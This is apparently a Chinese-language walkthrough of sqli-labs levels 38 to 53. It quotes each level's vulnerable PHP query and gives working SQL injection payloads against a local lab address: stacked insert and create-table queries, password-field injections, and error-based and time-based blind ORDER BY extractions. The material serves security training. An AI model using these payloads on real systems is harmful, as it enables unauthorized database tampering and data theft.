堆叠注入(stacked injection)从名词的含义就可以看到是一堆sql语句(多条)一起执行。
具体请先了解:SQL堆叠注入(堆查询注入)原理与实例分析
Less38
GET - 堆叠查询注入 - 字符串
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
mysqli_multi_query()函数:执行多个针对数据库的查询
注入示例:
http://192.168.1.104/sqli-labs/Less-38/?id=1';insert into users(username,password) values('less38','less38') -- +
Less39
GET - 堆叠查询注入 - 基于int整型
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
注入示例:
http://192.168.1.104/sqli-labs/Less-39/?id=1;insert into users(username,password) values('less39','less39') -- +
友情提示:盲注,错误不回显。
Less40
GET - 基于盲注 - 堆叠
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
注入示例:
http://192.168.1.104/sqli-labs/Less-40/?id=1');insert into users(username,password) values('less40','less40') -- +
Less41
GET - 基于盲注 - int整型 - 堆叠
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
注入示例:
http://192.168.1.104/sqli-labs/Less-41/?id=1;insert into users(username,password) values('less41','less41') -- +
Less42
POST - 基于错误 - 字符串 - 堆叠
分析:
Update更新数据后,经过 mysql_real_escape_string() 处理后的数据,存入到数据库当中后不会发生变化。在select调用的时候才能发挥作用,所以不用考虑在更新密码处进行注入,这关和以前的二次注入的思路是不一样的。查看 login.php 源代码:
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql))Password变量在post过程中,没有通过mysql_real_escape_string()函数的处理。因此在登录的时候密码选项我们可以进行attack。
用户名可以随意填写;
密码我们可以构造进行注入;
注入示例:
BurpSuite抓包
login_user=admin&login_password=c';create table less42 like users#&mysubmit=Login
Less-43
POST - 基于盲注 - 字符串 - 堆叠和小括号
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
if (@mysqli_multi_query($con1, $sql))
注入示例:
BurpSuite抓包
login_user=admin&login_password=c');create table less43 like users#&mysubmit=Login
Less-44
POST - 基于错误 - 字符串 - 堆叠 - 盲注
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql))
注入示例:
BurpSuite抓包
login_user=admin&login_password=c';insert into users(username,password) values ('less44','less44')#&mysubmit=Login
Less-45
POST - 基于错误 - 字符串 - 堆叠 - 盲注
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
if (@mysqli_multi_query($con1, $sql))
注入示例:
BurpSuite抓包
login_user=admin&login_password=c');insert into users(username,password) values ('less45','less45')#&mysubmit=Login
Less-46
GET - 基于错误 - Numeric数字型 - order by子句
$sql = "SELECT * FROM users ORDER BY $id";
注入方法:
①直接添加注入语句。?sort=(select ******)
②利用一些函数。例如rand()函数等。?sort=rand(sql语句)
③利用and。例如?sort=1 and (加sql语句)。
注入示例:
http://192.168.1.104/sqli-labs/Less-46/?sort=1 desc 表明皮存在注入点http://192.168.1.104/sqli-labs/Less-46/?sort=left(version(),1) 没有报错,数字不起作用http://192.168.1.104/sqli-labs/Less-46/?sort=extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+盲注:时间延迟注入
http://192.168.1.104/sqli-labs/Less-46/?sort=(SELECT IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,md5('1')),null) FROM (select database() as current) as tb1)
http://192.168.1.104/sqli-labs/Less-46/?sort=1 and If(ascii(substr(database(),1,1))=116,0,sleep(5))http://192.168.1.104/sqli-labs/Less-46/?sort=rand(ascii(left(database(),1))=115)
Less-47
GET - 基于错误 - 字符串 - order by子句
$sql = "SELECT * FROM users ORDER BY '$id'";
注入示例:
报错注入
http://192.168.1.104/sqli-labs/Less-47?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
http://192.168.1.104/sqli-labs/Less-47?sort=1'and (select * from%20(select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+
http://192.168.1.104/sqli-labs/Less-47/?sort=1' and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))) -- +
Less-48
GET - 基于错误 - 盲注 - 数字整型 - order by子句
$sql = "SELECT * FROM users ORDER BY $id";
注入示例:
http://192.168.1.104/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=178)http://192.168.1.104/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=115)http://192.168.1.104/sqli-labs/Less-48/?sort=1 and (If(ascii(substr(database(),1,1))=115,0,sleep(5)))
Less-49
GET - 基于错误 - 盲注 - 字符串 - order by子句
$sql = "SELECT * FROM users ORDER BY '$id'";
注入示例:
http://192.168.1.104/sqli-labs/Less-49/?sort=1' and (If(ascii(substr((select username from users where id=1),1,1))=69,0,sleep(5))) --+
Less-50
GET - 基于错误 - order by子句 - 数字整型 - 堆叠
$sql="SELECT * FROM users ORDER BY $id";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
注入示例:
http://192.168.1.104/sqli-labs/Less-50/?sort=1;create table less50 like users -- +
Less-51
GET - 基于错误 - order by子句 - 字符串 - 堆叠
$sql="SELECT * FROM users ORDER BY '$id'";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
注入示例:
http://192.168.1.104/sqli-labs/Less-51/?sort=1';create table less51 like users -- +
Less-52
GET - 基于盲注 - order by子句 - 数字整型 - 堆叠
$sql="SELECT * FROM users ORDER BY $id";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
注入示例:
http://192.168.1.104/sqli-labs/Less-52/?sort=1;create table less52 like users -- +
Less-53
GET - 基于盲注 - order by子句 - 字符串 - 堆叠
$sql="SELECT * FROM users ORDER BY '$id'";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
注入示例:
http://192.168.1.104/sqli-labs/Less-53/?sort=1';create table less53 like users -- +
